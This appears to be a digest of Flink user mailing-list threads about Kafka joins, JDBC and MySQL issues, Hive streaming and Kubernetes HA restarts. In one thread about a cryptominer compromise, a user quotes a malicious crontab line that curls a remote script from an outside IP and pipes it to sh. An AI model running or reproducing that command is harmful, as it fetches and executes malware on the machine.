Re: A few questions about Upsert-kafka as a source
When doing a join, ksql forcibly checks that the keys of the two tables are identical and raises an error if they are not, which seems like a good approach. You said: "Currently Upsert-kafka requires that records with the same key sit in the same partition, because Kafka only guarantees in-order reads by offset within a partition; if records with the same key were spread across partitions, reads would be out of order." In Flink, two tables can be joined successfully even without using the same key, but the data comes out wrong. Given that, failing at SQL compile time would be better.
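To make the constraint concrete, here is a minimal Flink SQL sketch of what "same key" means in practice, assuming two hypothetical upsert-kafka tables (topic names, schemas, and the broker address are illustrative only):

-- Both tables declare the same PRIMARY KEY, so records with the same
-- key land in the same partition of each topic and arrive in order.
CREATE TABLE orders (
  id BIGINT,
  amount DECIMAL(10, 2),
  PRIMARY KEY (id) NOT ENFORCED
) WITH (
  'connector' = 'upsert-kafka',
  'topic' = 'orders',
  'properties.bootstrap.servers' = 'broker:9092',
  'key.format' = 'json',
  'value.format' = 'json'
);

CREATE TABLE users (
  id BIGINT,
  name STRING,
  PRIMARY KEY (id) NOT ENFORCED
) WITH (
  'connector' = 'upsert-kafka',
  'topic' = 'users',
  'properties.bootstrap.servers' = 'broker:9092',
  'key.format' = 'json',
  'value.format' = 'json'
);

-- Joining on the declared key is safe; joining on any other column
-- risks the out-of-order updates described above.
SELECT o.id, u.name, o.amount
FROM orders AS o
JOIN users AS u ON o.id = u.id;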
Re: A few questions about Upsert-kafka as a source
I'd also like to know whether Flink has any requirement that Kafka messages be partitioned by the primary key when joining them; KSQL enforces this.
Can a Flink job manager under HA be manually restarted like a Hadoop NameNode?
Can a Flink job manager under HA be manually restarted like a Hadoop NameNode while keeping the cluster running? I've noticed the job manager's memory usage seems to keep growing slowly. Hadoop NameNode has the same issue, which I work around by rolling-restarting the NameNode at intervals. Under HA, can Flink job managers be rolling-restarted the same way?
What causes "Could not connect to BlobServer"?
Running a 1.12.2 standalone cluster, errors like the following appear from time to time. What could be causing this? Thanks!

Caused by: java.io.IOException: Failed to fetch BLOB fb90d0fce9ff3ad8353ea97e46f9c913/p-bc0d39187ed200f9df64f90463534862858961a2-2ff77a5adb95af29376c6699173c3969 from hb3-dev-gem-svc1-000/10.30.69.13:43003 and store it under /home/gum/flink_tmp/blobStore-e82a4a09-0f9c-4846-902c-b18c6fd09dae/incoming/temp-1153
    at org.apache.flink.runtime.blob.BlobClient.downloadFromBlobServer(BlobClient.java:167)
    at org.apache.flink.runtime.blob.AbstractBlobCache.getFileInternal(AbstractBlobCache.java:166)
    at org.apache.flink.runtime.blob.PermanentBlobCache.getFile(PermanentBlobCache.java:187)
    at org.apache.flink.runtime.execution.librarycache.BlobLibraryCacheManager$LibraryCacheEntry.createUserCodeClassLoader(BlobLibraryCacheManager.java:251)
    at org.apache.flink.runtime.execution.librarycache.BlobLibraryCacheManager$LibraryCacheEntry.getOrResolveClassLoader(BlobLibraryCacheManager.java:228)
    at org.apache.flink.runtime.execution.librarycache.BlobLibraryCacheManager$LibraryCacheEntry.access$1100(BlobLibraryCacheManager.java:199)
    at org.apache.flink.runtime.execution.librarycache.BlobLibraryCacheManager$DefaultClassLoaderLease.getOrResolveClassLoader(BlobLibraryCacheManager.java:333)
    at org.apache.flink.runtime.taskmanager.Task.createUserCodeClassloader(Task.java:983)
    at org.apache.flink.runtime.taskmanager.Task.doRun(Task.java:632)
    at org.apache.flink.runtime.taskmanager.Task.run(Task.java:570)
    at java.lang.Thread.run(Thread.java:748)
Caused by: java.io.IOException: Could not connect to BlobServer at address hb3-dev-gem-svc1-000/10.30.69.13:43003
    at org.apache.flink.runtime.blob.BlobClient.<init>(BlobClient.java:102)
    at org.apache.flink.runtime.blob.BlobClient.downloadFromBlobServer(BlobClient.java:137)
    ... 10 more
Caused by: java.net.UnknownHostException: hb3-dev-gem-svc1-000
    at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:184)
    at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392)
    at java.net.Socket.connect(Socket.java:607)
    at org.apache.flink.runtime.blob.BlobClient.<init>(BlobClient.java:96)
    ... 11 more
Re: flink 1.12.2-rc2 compromised by a cryptominer
I'm not a security expert and don't know how to confirm that this is a Flink problem, but from the symptoms it looks very similar to the issue Flink 1.10 had. I'd suggest adding test cases for this and publishing the test results.
Re: flink 1.12.2-rc2 compromised by a cryptominer
I built https://github.com/apache/flink/archive/release-1.12.2-rc2.tar.gz myself and deployed it on a server. To apply OS patches I bound a public IP, at which point the jobmanager's port 8081 was exposed to the internet, and then a mining program got in and added this line to crontab:

* * * * * curl http://195.3.146.118/spr.sh | sh > /dev/null 2>&1

I ran into a similar situation when using 1.10. I remembered that 1.12 supposedly no longer had this problem, so I wasn't paying attention this time, and it happened again. I can basically confirm Flink was the entry point, because the server was freshly installed and only the Flink processes were running.
flink 1.12.2-rc2 compromised by a cryptominer
My build of flink 1.12.2-rc2 was hit by a cryptominer. Wasn't this vulnerability already closed?
Re: Fw: Problem with flinksql writing to Hive
Do you have checkpointing enabled?
Re: How to read a MySQL datetime column in flink 1.12
I confirmed through experiments that this is caused by upgrading to MySQL JDBC Driver 8.0.23; going back to MySQL JDBC Driver 8.0.22 makes the problem disappear. I filed https://issues.apache.org/jira/browse/FLINK-21240
How to read a MySQL datetime column in flink 1.12
The table created in MySQL:

CREATE TABLE `p_port_packet_loss_5m` (
  `id` binary(16) NOT NULL,
  `coltime` datetime NOT NULL,
  ...

The table created in Flink:

create table if not exists p_port_packet_loss_5m (
  id bytes,
  coltime timestamp,
  ...
) WITH (
  'connector' = 'jdbc',
  'url' = 'jdbc:mysql://ip:port/mydatabase',
  ...

Running select * from p_port_packet_loss_5m; in the Flink SQL client always fails with

java.lang.ClassCastException: java.time.LocalDateTime cannot be cast to java.sql.Timestamp

I've tried quite a few different data types without success. How should this be handled?
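For reference, a minimal sketch of the Flink DDL this thread describes, using the JDBC connector's documented type mapping (MySQL BINARY(16) -> BYTES, DATETIME -> TIMESTAMP(6)); host, port, credentials, and the 'table-name' value are placeholders. As the reply above notes, the ClassCastException ultimately came from the 8.0.23 driver rather than the declared types:

CREATE TABLE p_port_packet_loss_5m (
  id BYTES,
  coltime TIMESTAMP(6)
) WITH (
  'connector' = 'jdbc',
  'url' = 'jdbc:mysql://host:3306/mydatabase', -- placeholder host/port
  'table-name' = 'p_port_packet_loss_5m',
  'username' = 'user',                         -- placeholder credentials
  'password' = 'secret'
);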
Re: Is it possible to join a Hive stream with a Hive stream?
Does the current 1.13-snapshot support it? Can I give it a try?
Re: Is it possible to join a Hive stream with a Hive stream?
p1.time is the time carried in the data records, and the same time is used for partitioning.
Re: Flink 1.12.1 inserts into MySQL sometimes take very long
Sometimes such a job keeps running for more than two hours and all I can do is cancel it, but the cancel never completes normally and always brings the taskmanager down. The errors are as follows:

2021-01-31 23:04:23,677 ERROR org.apache.flink.runtime.taskexecutor.TaskExecutor [] - Task did not exit gracefully within 180 + seconds.
org.apache.flink.util.FlinkRuntimeException: Task did not exit gracefully within 180 + seconds.
    at org.apache.flink.runtime.taskmanager.Task$TaskCancelerWatchDog.run(Task.java:1685) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at java.lang.Thread.run(Thread.java:748) [?:1.8.0_282]
2021-01-31 23:04:23,685 ERROR org.apache.flink.runtime.taskexecutor.TaskManagerRunner [] - Fatal error occurred while executing the TaskManager. Shutting it down...
org.apache.flink.util.FlinkRuntimeException: Task did not exit gracefully within 180 + seconds.
    at org.apache.flink.runtime.taskmanager.Task$TaskCancelerWatchDog.run(Task.java:1685) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at java.lang.Thread.run(Thread.java:748) [?:1.8.0_282]
2021-01-31 23:04:23,686 INFO org.apache.flink.runtime.taskexecutor.TaskExecutor [] - Stopping TaskExecutor akka.tcp://flink@10.13.69.52:45901/user/rpc/taskmanager_0.
2021-01-31 23:04:23,686 INFO org.apache.flink.runtime.taskexecutor.TaskExecutor [] - Close ResourceManager connection 1bd159f361d86e77d17e261ab44b5128.
2021-01-31 23:04:23,689 WARN org.apache.flink.runtime.taskmanager.Task [] - Task 'Source: HiveSource-snmpprobe.p_port_traffic_5m -> Calc(select=[binaryid AS id, ver, CAST(2021-01-31 21:45:00:TIMESTAMP(6)) AS coltime, CAST(in_octets) AS in_octets, CAST(out_octets) AS out_octets, CAST(bi_octets) AS bi_octets, CAST(unimax_octets) AS unimax_octets, in_speed, out_speed, bi_speed, unimax_speed, in_util, out_util, bi_util, unimax_util, inout_ratio, bandwidth, origin, CAST((() DATE_FORMAT _UTF-16LE'-MM-dd HH:mm:ss')) AS crtime], where=[(coltime = 2021-01-31 21:45:00:TIMESTAMP(9))]) -> Sink: Sink(table=[myhive.prod_mysql_zqzynetdb.p_port_traffic_5m], fields=[id, ver, coltime, in_octets, out_octets, bi_octets, unimax_octets, in_speed, out_speed, bi_speed, unimax_speed, in_util, out_util, bi_util, unimax_util, inout_ratio, bandwidth, origin, crtime]) (1/1)#0' did not react to cancelling signal for 30 seconds, but is stuck in method:
java.net.SocketInputStream.socketRead0(Native Method)
java.net.SocketInputStream.socketRead(SocketInputStream.java:116)
java.net.SocketInputStream.read(SocketInputStream.java:171)
java.net.SocketInputStream.read(SocketInputStream.java:141)
com.mysql.cj.protocol.ReadAheadInputStream.fill(ReadAheadInputStream.java:107)
com.mysql.cj.protocol.ReadAheadInputStream.readFromUnderlyingStreamIfNecessary(ReadAheadInputStream.java:150)
com.mysql.cj.protocol.ReadAheadInputStream.read(ReadAheadInputStream.java:180)
java.io.FilterInputStream.read(FilterInputStream.java:133)
com.mysql.cj.protocol.FullReadInputStream.readFully(FullReadInputStream.java:64)
com.mysql.cj.protocol.a.SimplePacketReader.readHeader(SimplePacketReader.java:63)
com.mysql.cj.protocol.a.SimplePacketReader.readHeader(SimplePacketReader.java:45)
com.mysql.cj.protocol.a.TimeTrackingPacketReader.readHeader(TimeTrackingPacketReader.java:52)
com.mysql.cj.protocol.a.TimeTrackingPacketReader.readHeader(TimeTrackingPacketReader.java:41)
com.mysql.cj.protocol.a.MultiPacketReader.readHeader(MultiPacketReader.java:54)
com.mysql.cj.protocol.a.MultiPacketReader.readHeader(MultiPacketReader.java:44)
com.mysql.cj.protocol.a.NativeProtocol.readMessage(NativeProtocol.java:538)
com.mysql.cj.protocol.a.NativeProtocol.checkErrorMessage(NativeProtocol.java:708)
com.mysql.cj.protocol.a.NativeProtocol.sendCommand(NativeProtocol.java:647)
com.mysql.cj.protocol.a.NativeProtocol.sendQueryPacket(NativeProtocol.java:946)
com.mysql.cj.NativeSession.execSQL(NativeSession.java:1075)
com.mysql.cj.jdbc.ClientPreparedStatement.executeInternal(ClientPreparedStatement.java:930)
com.mysql.cj.jdbc.ClientPreparedStatement.executeUpdateInternal(ClientPreparedStatement.java:1092)
com.mysql.cj.jdbc.ClientPreparedStatement.executeBatchSerially(ClientPreparedStatement.java:832)
com.mysql.cj.jdbc.ClientPreparedStatement.executeBatchInternal(ClientPreparedStatement.java:435)
com.mysql.cj.jdbc.StatementImpl.executeBatch(StatementImpl.java:796)
org.apache.flink.connector.jdbc.statement.FieldNamedPreparedStatementImpl.executeBatch(FieldNamedPreparedStatementImpl.java:65)
org.apache.flink.connector.jdbc.internal.executor.TableSimpleStatementExecutor.executeBatch(TableSimpleStatementExecutor.java:64)
org.apache.flink.connector.jdbc.internal.executor.TableBufferReducedStatementExecutor.executeBatch(TableBufferReducedStatementExecutor.java:101)
org.apache.flink.connector.jdbc.internal.JdbcBatchingOutputFormat.attemptFlush(JdbcBatchingOutputFormat.java:216)
org.apache.flink.connector.jdbc.internal.JdbcBatchingOutputFormat.flush(JdbcBatchingOutputFormat.java:184)
org.apache.flink.connector.jdbc.internal.JdbcBatchingOutputFormat.writeRecord(JdbcBatchingOutputFormat.java:167)
org.apac
Re: Flink 1.12.1 inserts into MySQL sometimes take very long
With DEBUG-level logging enabled, there are errors like this:

2021-01-31 20:45:30,364 DEBUG org.apache.flink.runtime.io.network.partition.ResultPartitionManager [] - Released partition dc8a2804b6df6b0ceaee2610ccf6c6e5#312 produced by 448c5ac36dcda818f56ec5bbd728da10.
2021-01-31 20:45:30,392 DEBUG org.apache.flink.runtime.taskexecutor.TaskExecutor [] - Free slot with allocation id 80a1592c9e59efd80e412e7dee99f70c because: Stopping JobMaster for job ifXTable->p_port_traffic_5m @2021-01-31 20:30:00(d055754b88483b13648cc3fb32d9cd58).
2021-01-31 20:45:30,392 DEBUG org.apache.flink.runtime.taskexecutor.slot.TaskSlotTableImpl [] - Free slot TaskSlot(index:2, state:ACTIVE, resource profile: ResourceProfile{cpuCores=1., taskHeapMemory=344.000mb (360710140 bytes), taskOffHeapMemory=0 bytes, managedMemory=256.000mb (268435460 bytes), networkMemory=32.000mb (33554432 bytes)}, allocationId: 80a1592c9e59efd80e412e7dee99f70c, jobId: d055754b88483b13648cc3fb32d9cd58).
org.apache.flink.util.FlinkException: Stopping JobMaster for job ifXTable->p_port_traffic_5m @2021-01-31 20:30:00(d055754b88483b13648cc3fb32d9cd58).
    at org.apache.flink.runtime.jobmaster.JobMaster.onStop(JobMaster.java:416) ~[flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.runtime.rpc.RpcEndpoint.internalCallOnStop(RpcEndpoint.java:214) ~[flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.runtime.rpc.akka.AkkaRpcActor$StartedState.terminate(AkkaRpcActor.java:565) ~[flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.runtime.rpc.akka.AkkaRpcActor.handleControlMessage(AkkaRpcActor.java:187) ~[flink-dist_2.11-1.12.1.jar:1.12.1]
    at akka.japi.pf.UnitCaseStatement.apply(CaseStatements.scala:26) ~[flink-dist_2.11-1.12.1.jar:1.12.1]
    at akka.japi.pf.UnitCaseStatement.apply(CaseStatements.scala:21) ~[flink-dist_2.11-1.12.1.jar:1.12.1]
    at scala.PartialFunction$class.applyOrElse(PartialFunction.scala:123) ~[flink-dist_2.11-1.12.1.jar:1.12.1]
    at akka.japi.pf.UnitCaseStatement.applyOrElse(CaseStatements.scala:21) ~[flink-dist_2.11-1.12.1.jar:1.12.1]
    at scala.PartialFunction$OrElse.applyOrElse(PartialFunction.scala:170) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at scala.PartialFunction$OrElse.applyOrElse(PartialFunction.scala:171) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at akka.actor.Actor$class.aroundReceive(Actor.scala:517) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at akka.actor.AbstractActor.aroundReceive(AbstractActor.scala:225) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at akka.actor.ActorCell.receiveMessage(ActorCell.scala:592) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at akka.actor.ActorCell.invoke(ActorCell.scala:561) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at akka.dispatch.Mailbox.processMailbox(Mailbox.scala:258) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at akka.dispatch.Mailbox.run(Mailbox.scala:225) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at akka.dispatch.Mailbox.exec(Mailbox.scala:235) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at akka.dispatch.forkjoin.ForkJoinTask.doExec(ForkJoinTask.java:260) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at akka.dispatch.forkjoin.ForkJoinPool$WorkQueue.runTask(ForkJoinPool.java:1339) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at akka.dispatch.forkjoin.ForkJoinPool.runWorker(ForkJoinPool.java:1979) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at akka.dispatch.forkjoin.ForkJoinWorkerThread.run(ForkJoinWorkerThread.java:107) [flink-dist_2.11-1.12.1.jar:1.12.1]
2021-01-31 20:45:30,393 DEBUG org.apache.flink.runtime.state.TaskExecutorLocalStateStoresManager [] - Releasing local state under allocation id 80a1592c9e59efd80e412e7dee99f70c.
2021-01-31 20:45:30,393 DEBUG org.apache.flink.runtime.taskexecutor.TaskExecutor [] - Free slot with allocation id 4606a6194b4380efb5c2f95fc65bf01e because: Stopping JobMaster for job ifXTable->p_port_traffic_5m @2021-01-31 20:30:00(d055754b88483b13648cc3fb32d9cd58).
2021-01-31 20:45:30,393 DEBUG org.apache.flink.runtime.taskexecutor.slot.TaskSlotTableImpl [] - Free slot TaskSlot(index:12, state:ACTIVE, resource profile: ResourceProfile{cpuCores=1., taskHeapMemory=344.000mb (360710140 bytes), taskOffHeapMemory=0 bytes, managedMemory=256.000mb (268435460 bytes), networkMemory=32.000mb (33554432 bytes)}, allocationId: 4606a6194b4380efb5c2f95fc65bf01e, jobId: d055754b88483b13648cc3fb32d9cd58).
org.apache.flink.util.FlinkException: Stopping JobMaster for job ifXTable->p_port_traffic_5m @2021-01-31 20:30:00(d055754b88483b13648cc3fb32d9cd58).
    at org.apache.flink.runtime.jobmaster.JobMaster.onStop(JobMaster.java:416) ~[flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.runtime.rpc.RpcEndpoint.internalCallOnStop(RpcEndpoint.java:214) ~[flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.runtime.rpc.akka.AkkaRpcActor$StartedState.terminate(AkkaRpcActor.java:565) ~[flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.runtime.rpc.akka.AkkaRpcActor.h
Flink 1.12.1 inserts into MySQL sometimes take very long
A periodic batch-mode job extracts data from Hive and inserts it into MySQL, 10K to 20K rows per batch. Most of the time it finishes in 10-20 seconds, but every so often it takes much longer, up to 20-odd minutes, although it still succeeds. The logs show no errors, MySQL shows no table locks, and I suspected Hive metastore performance but found nothing there either. How should I go about analyzing this? Can Flink show what the job is waiting on?
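One Flink-side factor worth ruling out is the JDBC sink's buffering and retry behavior, since a batch is only flushed when a row-count or time threshold is reached, and failed batches are retried. A sketch of the relevant connector options on a hypothetical sink table (schema and values are illustrative, not a tuning recommendation):

CREATE TABLE mysql_sink (
  id BYTES,
  coltime TIMESTAMP(6)
) WITH (
  'connector' = 'jdbc',
  'url' = 'jdbc:mysql://host:3306/mydatabase', -- placeholder
  'table-name' = 'p_port_traffic_5m',
  'sink.buffer-flush.max-rows' = '100', -- rows buffered before a flush
  'sink.buffer-flush.interval' = '1s',  -- maximum time between flushes
  'sink.max-retries' = '3'              -- retries per failed batch
);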
Is it possible to join a Hive stream with a Hive stream?
The concrete need is this: a probe writes each channel's cumulative traffic into a Hive table every 5 minutes. To get a channel's traffic within a 5-minute window, two consecutive cumulative readings must be subtracted. I'd like to join the same Hive table against itself, forming a join of two Hive streams. Can this be done, or is there another way? Right now I run it in batch mode from crontab and would like to switch to stream mode:

select p1.traffic - p2.traffic
from p as p1
inner join p as p2
  on p1.id = p2.id
 and p1.time = p2.time + interval '5' minute
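If both sides were read as streams, the batch query above would roughly correspond to an event-time interval join. A sketch under the assumptions that ts is an event-time attribute derived from p1.time with a watermark, and that readings land exactly on 5-minute boundaries; streaming reads of Hive tables and interval joins each come with caveats, so this is a shape rather than a tested solution:

-- Pair each reading with the one exactly 5 minutes earlier for the same id.
SELECT cur.id,
       cur.traffic - prev.traffic AS traffic_5m
FROM p AS cur
JOIN p AS prev
  ON cur.id = prev.id
 AND prev.ts = cur.ts - INTERVAL '5' MINUTE;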
Re: No Python 3.8 package for pyflink 1.12.1
Thanks! Sorry, I didn't read the documentation carefully. Is there anywhere to download a pre-built pyflink 1.12.1 for Python 3.8 on Linux now? I'm not entirely comfortable with my own build.
No Python 3.8 package for pyflink 1.12.1
pyflink 1.12.1 cannot be installed on Linux with Python 3.8; the highest installable version is 1.12.0. Looking at the available files at https://pypi.org/project/apache-flink/#files, Python 3.8 has only one file for 1.12.1, apache_flink-1.12.1-cp38-cp38-macosx_10_9_x86_64.whl, whereas pyflink 1.12.0 has two files for Python 3.8: apache_flink-1.12.0-cp38-cp38-manylinux1_x86_64.whl and apache_flink-1.12.0-cp38-cp38-macosx_10_9_x86_64.whl. Is the 1.12.1 file set incomplete?
Re: Periodic jobmanager restarts with 1.12.1 in K8s HA session mode
Did you get it? Did you find anything?
Re: Periodic jobmanager restarts with 1.12.1 in K8s HA session mode
https://pan.baidu.com/s/1GHdfeF2y8RUW_Htgdn4KbQ extraction code: piaf
Re: Periodic jobmanager restarts with 1.12.1 in K8s HA session mode
Yes, that works. How should I send it to you?
Re: Periodic jobmanager restarts with 1.12.1 in K8s HA session mode
Thanks! With DEBUG logging enabled there is still only that final ERROR, but before it there are quite a few log lines containing kubernetes.client.dsl.internal.WatchConnectionManager. I grepped a sample; can you see anything in this?

job-debug-0118.log:2021-01-19 02:12:25,551 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket successfully opened
job-debug-0118.log:2021-01-19 02:12:25,646 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Connecting websocket ... io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@2553d42c
job-debug-0118.log:2021-01-19 02:12:25,647 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket successfully opened
job-debug-0118.log:2021-01-19 02:12:30,128 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Connecting websocket ... io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@5a9fa83e
job-debug-0118.log:2021-01-19 02:12:30,176 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket successfully opened
job-debug-0118.log:2021-01-19 02:12:39,028 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Force closing the watch io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@2553d42c
job-debug-0118.log:2021-01-19 02:12:39,028 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Closing websocket org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket@15b15029
job-debug-0118.log:2021-01-19 02:12:39,030 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket close received. code: 1000, reason:
job-debug-0118.log:2021-01-19 02:12:39,030 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Ignoring onClose for already closed/closing websocket
job-debug-0118.log:2021-01-19 02:12:39,031 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Force closing the watch io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@2cdbe5a0
job-debug-0118.log:2021-01-19 02:12:39,031 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Closing websocket org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket@1e3f5396
job-debug-0118.log:2021-01-19 02:12:39,033 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket close received. code: 1000, reason:
job-debug-0118.log:2021-01-19 02:12:39,033 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Ignoring onClose for already closed/closing websocket
job-debug-0118.log:2021-01-19 02:12:42,677 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Connecting websocket ... io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@210aab4b
job-debug-0118.log:2021-01-19 02:12:42,678 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket successfully opened
job-debug-0118.log:2021-01-19 02:12:42,920 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Connecting websocket ... io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@278d8398
job-debug-0118.log:2021-01-19 02:12:42,921 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket successfully opened
job-debug-0118.log:2021-01-19 02:12:45,130 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Connecting websocket ... io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@4b318628
job-debug-0118.log:2021-01-19 02:12:45,132 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket successfully opened
job-debug-0118.log:2021-01-19 02:13:05,927 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Force closing the watch io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@278d8398
job-debug-0118.log:2021-01-19 02:13:05,927 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Closing websocket org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket@69d1ebd2
job-debug-0118.log:2021-01-19 02:13:05,930 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket close received. code: 1000, reason:
job-debug-0118.log:2021-01-19 02:13:05,930 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Ignoring onClose for already closed/closing websocket
job-debug-0118.log:2021-01-19 02:13:05,940 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Force closing the watch io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager@210aab4b
job-debug-0118.log:2021-01-19 02:13:05,940 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - Closing websocket org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket@3db9d8d8
job-debug-0118.log:2021-01-19 02:13:05,942 DEBUG io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager [] - WebSocket close received. code: 10
Re: Periodic jobmanager restarts with 1.12.1 in K8s HA session mode
I went back through the earlier logs and found no "too old resource version"; several consecutive logs show no other error at all, just this one error, then the restart, then a fresh log. The k8s cluster I'm using does seem to have a rather unstable network. What would be a good way to test the network between the Pod and the APIServer so that the result is conclusive? ping? Some other tool?
Re: flink1.12.0 HA on native k8s produces a large number of jobmanager-leader ConfigMaps over time
Hello, I've just started running Flink 1.12.1 HA on k8s and the jobmanager restarts about every half hour, always with this error. Have you run into it? Thanks!

2021-01-17 04:52:12,399 INFO org.apache.flink.runtime.jobmaster.slotpool.SlotPoolImpl [] - Suspending SlotPool.
2021-01-17 04:52:12,399 INFO org.apache.flink.runtime.jobmaster.JobMaster [] - Close ResourceManager connection 28ed7c84e7f395c5a34880df91b251c6: Stopping JobMaster for job p_port_traffic_5m@hive->mysql @2021-01-17 11:40:00(67fb9b15d0deff998e287aa7e2cf1c7b)..
2021-01-17 04:52:12,399 INFO org.apache.flink.runtime.jobmaster.slotpool.SlotPoolImpl [] - Stopping SlotPool.
2021-01-17 04:52:12,399 INFO org.apache.flink.runtime.resourcemanager.StandaloneResourceManager [] - Disconnect job manager 8c450d0051eff8c045adb76cb9ec4...@akka.tcp://flink@flink-jobmanager:6123/user/rpc/jobmanager_32 for job 67fb9b15d0deff998e287aa7e2cf1c7b from the resource manager.
2021-01-17 04:52:12,399 INFO org.apache.flink.runtime.leaderelection.DefaultLeaderElectionService [] - Stopping DefaultLeaderElectionService.
2021-01-17 04:52:12,399 INFO org.apache.flink.kubernetes.highavailability.KubernetesLeaderElectionDriver [] - Closing KubernetesLeaderElectionDriver{configMapName='test-flink-etl-67fb9b15d0deff998e287aa7e2cf1c7b-jobmanager-leader'}.
2021-01-17 04:52:12,399 INFO org.apache.flink.kubernetes.kubeclient.resources.KubernetesConfigMapWatcher [] - The watcher is closing.
2021-01-17 04:52:12,416 INFO org.apache.flink.runtime.jobmanager.DefaultJobGraphStore [] - Removed job graph 67fb9b15d0deff998e287aa7e2cf1c7b from KubernetesStateHandleStore{configMapName='test-flink-etl-dispatcher-leader'}.
2021-01-17 04:52:30,686 ERROR org.apache.flink.runtime.resourcemanager.StandaloneResourceManager [] - Fatal error occurred in ResourceManager.
org.apache.flink.runtime.leaderretrieval.LeaderRetrievalException: Error while watching the ConfigMap test-flink-etl-12c0ac13184d3d98af71dadbc4a81d03-jobmanager-leader
    at org.apache.flink.kubernetes.highavailability.KubernetesLeaderRetrievalDriver$ConfigMapCallbackHandlerImpl.handleFatalError(KubernetesLeaderRetrievalDriver.java:120) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.kubeclient.resources.AbstractKubernetesWatcher.onClose(AbstractKubernetesWatcher.java:48) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at io.fabric8.kubernetes.client.utils.WatcherToggle.onClose(WatcherToggle.java:56) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager.closeEvent(WatchConnectionManager.java:367) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager.access$700(WatchConnectionManager.java:50) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager$1.onMessage(WatchConnectionManager.java:259) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket.onReadMessage(RealWebSocket.java:323) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.WebSocketReader.readMessageFrame(WebSocketReader.java:219) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.WebSocketReader.processNextFrame(WebSocketReader.java:105) [flink-dist_2.11-1.12.1.jar:1.12.1]
    at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket.loopReader(RealWebSocket.java:274) [flink-dist_2.11-1.12.1.jar:1.12.1]
